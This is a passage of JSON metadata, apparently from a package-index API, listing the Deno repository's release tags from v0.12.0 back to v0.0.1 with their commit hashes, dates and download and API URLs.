9:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/release